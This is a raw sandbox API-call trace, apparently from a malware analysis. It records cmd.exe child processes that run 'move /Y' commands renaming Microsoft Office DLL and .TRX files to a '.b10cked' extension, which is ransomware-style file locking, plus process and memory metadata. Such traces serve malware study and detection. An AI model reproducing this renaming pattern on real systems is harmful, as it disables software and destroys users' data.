lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f614*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.519] _wcsnicmp 
(_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0162.520] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0162.520] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0162.520] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0162.520] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0162.520] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0162.520] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0162.520] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0162.520] _wcsicmp (_String1="XLSLIC~1.TRX", _String2=".") returned 74 [0162.520] _wcsicmp (_String1="XLSLIC~1.TRX", _String2="..") returned 74 [0162.520] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlslic~1.trx")) returned 0x2020 [0162.521] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x331f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.521] SetErrorMode (uMode=0x0) returned 0x0 [0162.521] SetErrorMode (uMode=0x1) returned 0x0 [0162.521] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX", nBufferLength=0x104, lpBuffer=0x18efa4, lpFilePart=0x18ef8c | 
out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX", lpFilePart=0x18ef8c*="XLSLIC~1.TRX") returned 0x3c [0162.521] SetErrorMode (uMode=0x0) returned 0x1 [0162.521] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0162.521] _wcsicmp (_String1="XLSLIC~1.TRX", _String2=".") returned 74 [0162.521] _wcsicmp (_String1="XLSLIC~1.TRX", _String2="..") returned 74 [0162.521] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlslic~1.trx")) returned 0x2020 [0162.521] SetErrorMode (uMode=0x0) returned 0x0 [0162.521] SetErrorMode (uMode=0x1) returned 0x0 [0162.521] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX", nBufferLength=0x104, lpBuffer=0x18f420, lpFilePart=0x18f1b8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX", lpFilePart=0x18f1b8*="XLSLIC~1.TRX") returned 0x3c [0162.521] SetErrorMode (uMode=0x0) returned 0x1 [0162.521] SetErrorMode (uMode=0x0) returned 0x0 [0162.521] SetErrorMode (uMode=0x1) returned 0x0 [0162.522] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18f628, lpFilePart=0x18f1b8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll.b10cked", lpFilePart=0x18f1b8*="XLSLICER.DLL.trx_dll.b10cked") returned 0x4c [0162.522] SetErrorMode (uMode=0x0) returned 0x1 [0162.522] SetLastError (dwErrCode=0x0) [0162.522] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlslicer.dll.trx_dll.b10cked")) returned 0xffffffff [0162.522] 
GetLastError () returned 0x2 [0162.522] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x18eb34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb34) returned 0x332130 [0162.522] FindNextFileW (in: hFindFile=0x332130, lpFindFileData=0x18eb34 | out: lpFindFileData=0x18eb34) returned 0 [0162.523] GetLastError () returned 0x12 [0162.523] FindClose (in: hFindFile=0x332130 | out: hFindFile=0x332130) returned 1 [0162.524] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x331cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x331cc0) returned 0x332130 [0162.524] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18edcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0162.524] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x18edcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0162.524] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlslicer.dll.trx_dll")) returned 0x2020 [0162.524] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlslicer.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll.b10cked" (normalized: 
"c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlslicer.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0162.525] FindClose (in: hFindFile=0x332130 | out: hFindFile=0x332130) returned 1 [0162.525] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18ed80 | out: _Buffer=" 1") returned 9 [0162.525] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.525] GetFileType (hFile=0x7) returned 0x2 [0162.525] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0162.526] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18ed0c | out: lpMode=0x18ed0c) returned 1 [0162.526] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.526] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18ed40 | out: lpConsoleScreenBufferInfo=0x18ed40) returned 1 [0162.526] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0162.526] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18ed80 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0162.526] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18ed64, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18ed64*=0x1a) returned 1 [0162.527] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.527] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0162.527] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.527] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0162.527] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.527] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0162.527] SetConsoleInputExeNameW () returned 0x1 [0162.527] GetConsoleOutputCP () returned 0x1b5 [0162.527] 
GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.527] SetThreadUILanguage (LangId=0x0) returned 0x409 [0162.527] exit (_Code=0) Process: id = "278" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0x8f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22331 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22332 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22333 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22334 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 22335 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22336 start_va = 0x77230000 end_va = 0x7736bfff 
entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22337 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22338 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22339 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 22340 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22421 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22422 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22423 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22424 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 22425 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 22426 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22427 start_va = 0x75540000 end_va = 0x75589fff entry_point = 
0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22428 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22429 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22430 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22431 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22432 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22433 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22434 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22435 start_va = 0x280000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 22436 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = 
"\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22437 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22438 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 22439 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 22440 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 22441 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 22442 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 22443 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 22444 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Thread: id = 342 os_tid = 0x8e4 [0162.432] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf7d4 | out: lpSystemTimeAsFileTime=0x1cf7d4*(dwLowDateTime=0x9a30d040, dwHighDateTime=0x1d440a9)) [0162.432] GetCurrentProcessId () returned 0x8f0 [0162.432] GetCurrentThreadId () returned 0x8e4 [0162.432] GetTickCount () returned 0x313be [0162.432] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf7cc | out: lpPerformanceCount=0x1cf7cc*=21922099278) returned 1 [0162.433] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0162.433] __set_app_type (_Type=0x1) [0162.433] __p__fmode () returned 0x76b331f4 
[0162.433] __p__commode () returned 0x76b331fc [0162.433] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0162.433] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0162.433] GetCurrentThreadId () returned 0x8e4 [0162.433] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8e4) returned 0x38 [0162.433] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0162.433] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0162.433] SetThreadUILanguage (LangId=0x0) returned 0x409 [0162.433] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0162.433] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf764 | out: phkResult=0x1cf764*=0x0) returned 0x2 [0162.434] VirtualQuery (in: lpAddress=0x1cf79b, lpBuffer=0x1cf734, dwLength=0x1c | out: lpBuffer=0x1cf734*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.434] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf734, dwLength=0x1c | out: lpBuffer=0x1cf734*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0162.434] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf734, dwLength=0x1c | out: lpBuffer=0x1cf734*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0162.434] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf734, dwLength=0x1c | out: lpBuffer=0x1cf734*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, 
State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.434] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf734, dwLength=0x1c | out: lpBuffer=0x1cf734*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0162.434] GetConsoleOutputCP () returned 0x1b5 [0162.434] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.434] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0162.434] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.434] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0162.434] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.434] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0162.435] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.435] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0162.435] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.435] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0162.435] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.435] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0162.435] GetEnvironmentStringsW () returned 0x360210* [0162.435] FreeEnvironmentStringsW (penv=0x360210) returned 1 [0162.436] GetEnvironmentStringsW () returned 0x360210* [0162.436] FreeEnvironmentStringsW (penv=0x360210) returned 1 [0162.436] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce6d4 | out: phkResult=0x1ce6d4*=0x40) returned 0x0 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x0, lpData=0x1ce6e0*=0xa0, lpcbData=0x1ce6d8*=0x1000) returned 0x2 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", 
lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x4, lpData=0x1ce6e0*=0x1, lpcbData=0x1ce6d8*=0x4) returned 0x0 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x0, lpData=0x1ce6e0*=0x1, lpcbData=0x1ce6d8*=0x1000) returned 0x2 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x4, lpData=0x1ce6e0*=0x0, lpcbData=0x1ce6d8*=0x4) returned 0x0 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x4, lpData=0x1ce6e0*=0x40, lpcbData=0x1ce6d8*=0x4) returned 0x0 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x4, lpData=0x1ce6e0*=0x40, lpcbData=0x1ce6d8*=0x4) returned 0x0 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x0, lpData=0x1ce6e0*=0x40, lpcbData=0x1ce6d8*=0x1000) returned 0x2 [0162.436] RegCloseKey (hKey=0x40) returned 0x0 [0162.436] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce6d4 | out: phkResult=0x1ce6d4*=0x40) returned 0x0 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x0, lpData=0x1ce6e0*=0x40, lpcbData=0x1ce6d8*=0x1000) returned 0x2 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, 
lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x4, lpData=0x1ce6e0*=0x1, lpcbData=0x1ce6d8*=0x4) returned 0x0 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x0, lpData=0x1ce6e0*=0x1, lpcbData=0x1ce6d8*=0x1000) returned 0x2 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x4, lpData=0x1ce6e0*=0x0, lpcbData=0x1ce6d8*=0x4) returned 0x0 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x4, lpData=0x1ce6e0*=0x9, lpcbData=0x1ce6d8*=0x4) returned 0x0 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x4, lpData=0x1ce6e0*=0x9, lpcbData=0x1ce6d8*=0x4) returned 0x0 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x0, lpData=0x1ce6e0*=0x9, lpcbData=0x1ce6d8*=0x1000) returned 0x2 [0162.437] RegCloseKey (hKey=0x40) returned 0x0 [0162.437] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886384 [0162.437] srand (_Seed=0x5b886384) 